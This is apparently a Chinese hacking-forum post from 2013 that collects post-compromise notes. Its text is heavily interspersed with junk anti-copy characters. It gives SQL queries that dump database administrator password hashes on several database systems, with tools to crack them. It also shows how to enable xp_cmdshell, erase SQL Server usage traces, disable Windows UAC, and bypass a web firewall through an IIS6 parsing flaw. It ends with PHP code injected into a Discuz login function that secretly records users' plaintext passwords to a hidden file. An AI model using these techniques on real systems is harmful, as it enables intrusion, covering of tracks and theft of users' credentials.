在它下面直接插入即可,记录的密码生成在pwd.txt中,& W. w7 \4 {" j9 d
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
5 q9 R0 }4 g1 c9 Q; J( ~利用II6文件解析漏洞绕过安全狗代码:" K6 Y* m. U) n+ G" q- u8 ^' c7 P1 h
;antian365.asp;antian365.jpg2 b0 _3 s+ \2 C* G
% G, Q: k) s" H5 ]. b) m2 L( d. a% Z
各种类型数据库抓HASH破解最高权限密码!
' C) b4 c: H* r! J, Y1.sql server2000
Y! c/ }0 A h1 o1 M/ ~SELECT password from master.dbo.sysxlogins where name='sa'
* v* D# Z2 x4 x: M$ e3 z: B0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503411 g# O; W, d# l/ m2 v" E9 j7 X
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A" F( l. r7 t# D8 }
% W& T1 B0 @4 x
0×0100- constant header# u1 ?" ]: i/ t1 ?
34767D5C- salt
: M+ C; R/ a9 y J! Q; p/ ^0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
* w7 E/ T9 ^. X2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash8 f' b9 f: d! J7 K
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
7 K2 f7 L s [2 L" nSQL server 2005:-
3 j: Z- E/ Y7 V8 u7 RSELECT password_hash FROM sys.sql_logins where name='sa') w5 i! j& X! M5 p/ V# V9 a
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F4 }, w' X. A/ x* v5 R( S( \
0×0100- constant header
. p. s+ Z. F7 G: N" v- `8 D2 v993BF231-salt# Q: p" H/ G* [
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
- e: P' R) V4 Gcrack case sensitive hash in cain, try brute force and dictionary based attacks.
3 Z5 G0 ], W* \7 k" V3 }, \2 \' K' p5 ^7 {, n
update:- following bernardo’s comments:-% `4 u: u' Y* |2 S' G+ ^
use function fn_varbintohexstr() to cast password in a hex string.
* b x: s2 l4 }1 Q! se.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
5 w$ w, M% C$ r( Q( A, [ E; \) p
' S* S; Q( @9 }. ~! y Y$ lMYSQL:-- U+ P# T, `' s
5 a, s) ?4 Z3 Q/ k- Z* R' @In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.; n$ t% N8 o* O* G9 C# h, a
; p/ s, q: o4 Q7 W
*mysql < 4.1
; _3 }! a8 N1 `3 [+ T9 x) ?7 T7 l1 M$ ]. O7 k5 n& y- y' k: v& R- H) \
mysql> SELECT PASSWORD(‘mypass’);
7 f3 ]9 C- |6 }. V( z6 }9 I0 ]+——————–+% Y1 h' R: b* p: y4 P, \; n* P5 p
| PASSWORD(‘mypass’) |1 S. _0 L& m ]0 z/ C' X
+——————–+
$ x* c0 Q$ o. a8 I# z| 6f8c114b58f2ce9e |, C2 n1 w2 S# @8 o9 F
+——————–+4 S( Y5 ?' ?% J/ d1 Y+ i
8 o. Z. {' N Z4 M
*mysql >=4.1( }9 R* i7 @* ^8 G5 e
/ E; L4 w1 o% [1 n# C$ S, p0 o
mysql> SELECT PASSWORD(‘mypass’);
2 Z" [+ P4 U! q% N/ H9 D+——————————————-+8 {/ N/ V- o2 P: m9 t" v
| PASSWORD(‘mypass’) |: V1 s% O; A3 T" t5 @+ E; ^
+——————————————-+; C6 A* A- U9 j- \, \0 Q# b; c
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |+ m3 b( Z" n7 E: I/ `* _- C" w
+——————————————-+
) ?" p3 O: l% ~9 v0 ~( p9 U5 n& P, T. |
Select user, password from mysql.user9 O$ Y5 J2 v% R$ ^# n
The hashes can be cracked in ‘cain and abel’* D! W$ k n9 x/ n8 c
1 S. e* [6 Z& B# K
Postgres:-
: U: d+ p2 v% F( ?- oPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)2 _# \' q& d/ d3 N, q _
select usename, passwd from pg_shadow;' n* ?& y" g) f9 c
usename | passwd
/ c: Y7 x1 a$ ]! ~+ ~& d——————+————————————-
# A: d' i: R1 g- Q5 Btestuser | md5fabb6d7172aadfda4753bf0507ed4396
8 j: j# a( R0 a* I& M% duse mdcrack to crack these hashes:-$ h: X1 \3 J3 K1 B
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43966 q" e- A& R, q. N
5 p) X/ l1 f; POracle:-! q- O; \+ x) N% r, D
select name, password, spare4 from sys.user$
* q+ ?" v% X' d0 G9 Y9 ~hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g5 R( N5 i" E% [; ?
More on Oracle later, i am a bit bored….
Z% B, i1 {0 X0 B4 U* {
" t! @' B' J- d/ A! l1 p# q) g9 Y9 n* W: z+ E3 P: n& I
在sql server2005/2008中开启xp_cmdshell C; \# _9 G' L. s. i S. g) n
-- To allow advanced options to be changed.( Y) P' F- p' s( V# u$ R& e4 }! D& `
EXEC sp_configure 'show advanced options', 1/ }, L. t, `+ E- }4 L6 v1 A! k
GO) x, } y& W( G& e' d/ K
-- To update the currently configured value for advanced options.
; V' v1 @' Q7 ~5 t, XRECONFIGURE
/ ?! W" g' X- Z; `GO
& [6 v3 w5 \) V. {: E( R-- To enable the feature.0 K. y# e! A5 Z$ |/ i+ E
EXEC sp_configure 'xp_cmdshell', 1
\- `1 h- q2 A" L, pGO
9 L. Z& q' |8 Q-- To update the currently configured value for this feature.( S3 c# f: O8 a& I3 i7 K+ z
RECONFIGURE, ~+ B9 ^ U9 O e7 P ~2 Z4 q! F0 h* C- V
GO. K1 r: a% N: ?# s0 Z
SQL 2008 server日志清除,在清楚前一定要备份。
, y4 z% @2 n6 _9 {" B* w如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
+ A7 F# Z) c" [$ |1 v lX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
2 Z1 r$ {/ g: v# _. @8 l, Z2 d
$ [; q1 O8 h2 ^- f/ B) G对于SQL Server 2008以前的版本:
7 G4 P: @6 L: w; ZSQL Server 2005:
. S1 h" O; u- l0 [删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
2 m0 f- m+ @ v- y& ], XSQL Server 2000:6 H/ b. p! E& x
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
$ V4 q- Q! y- g9 p' M5 a, p% z; c9 b' T& m2 N2 ?
本帖最后由 simeon 于 2013-1-3 09:51 编辑( I% P- k3 \! P0 V* c6 g+ z' P( Y+ g
7 [9 @) i2 J% E* y; R
3 n: ]# Y+ z) J1 {+ }4 M; ywindows 2008 文件权限修改
' g2 w' r% n) ?- ?1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx% d7 C( V4 i: S/ T" m
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
- i9 R' C0 X$ ~. y2 l( p一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
* D% h. @, W# V9 B+ S! {; r
( B4 `. L3 o2 U& a, XWindows Registry Editor Version 5.00
( Z& Y1 i. c( c; n# o7 ~- n# }7 s[HKEY_CLASSES_ROOT\*\shell\runas]) d( n& u7 H$ @
@="管理员取得所有权"
6 D# s! ~6 i3 N"NoWorkingDirectory"=""9 P0 d1 ]% `; J
[HKEY_CLASSES_ROOT\*\shell\runas\command]5 }. `( Q8 {, l6 f9 d) A
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"" Y8 a8 a F6 B" t! L
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 y7 t0 ^4 I- l3 Z
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
7 S2 I& p) @! l8 C/ Y@="管理员取得所有权"
! k& k3 a' Y2 l) `, c. G" P"NoWorkingDirectory"=""9 Q: U2 d) v3 e5 [: K, T
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
/ K3 O, x" a, Y@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
1 @6 y+ U! u& A: P) I% x, Q# C3 d"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"9 ?& [+ f! H8 e' j6 p* O, ]
f" f1 k7 u2 q% E: a[HKEY_CLASSES_ROOT\Directory\shell\runas]
6 p! Y8 y$ h9 `* X& P@="管理员取得所有权"' Q* a) w8 k4 d4 q
"NoWorkingDirectory"=""
! y% ^9 I6 E* S# E% }, m[HKEY_CLASSES_ROOT\Directory\shell\runas\command]) e" W" U9 z: D9 D! _: }
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
# w, p3 ]+ t K- B+ F+ C; [7 F0 U"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"2 c7 O. K4 H- N' K
/ v/ X8 q/ |( h' \
4 p7 Q3 H2 u5 E T8 a- r8 h8 c
win7右键“管理员取得所有权”.reg导入
- _' q% N+ p6 Y( W% e二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,; S8 Q) g* k2 I& K( n9 @/ ~( a
1、C:\Windows这个路径的“notepad.exe”不需要替换
0 J8 w6 `$ [3 T8 R4 c2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
. l2 z7 Z$ j/ U9 J, v3、四个“notepad.exe.mui”不要管
+ u9 h8 O9 i$ H) H2 i/ [- o4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
; {3 m1 z1 y+ @( iC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe” p9 h# n2 a5 {" K3 J p
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,) |; K, d( Q0 H7 g
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
2 o, |. I: I- r, Nwindows 2008中关闭安全策略:
' o e& _$ |+ r; O! U8 ?reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f A' d/ l- x3 V2 }6 g1 b
修改uc_client目录下的client.php 在
& H: o2 e, m" ?# r& N6 xfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {( O/ z# r+ |/ T) e
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
3 X& {4 m& A3 K ?. A! l你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw, |: y7 D5 p& ^) i. ]& a; B
if(getenv('HTTP_CLIENT_IP')) {
8 M+ \- d5 r4 s& l& `! `5 P$onlineip = getenv('HTTP_CLIENT_IP');
" G# M( O. r) w$ ]8 e: d} elseif(getenv('HTTP_X_FORWARDED_FOR')) {6 h& X0 s7 S7 t# U
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
/ t- t" M1 b% t% D; A} elseif(getenv('REMOTE_ADDR')) {. n6 n3 ~, h) ?' c$ \
$onlineip = getenv('REMOTE_ADDR');9 Z2 h1 G2 _: S7 I2 t8 a4 K- r
} else {- E# c& j. s, w2 d2 R" Y
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];; V7 q* F" W2 W m1 e
}( u. p7 l/ F$ f' G
$showtime=date("Y-m-d H:i:s");1 S# y& p9 H# `* t; v
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";6 b8 {1 Y3 Q: p: a
$handle=fopen('./data/cache/csslog.php','a+');' _: J; f( Q4 G K, N5 S
$write=fwrite($handle,$record); |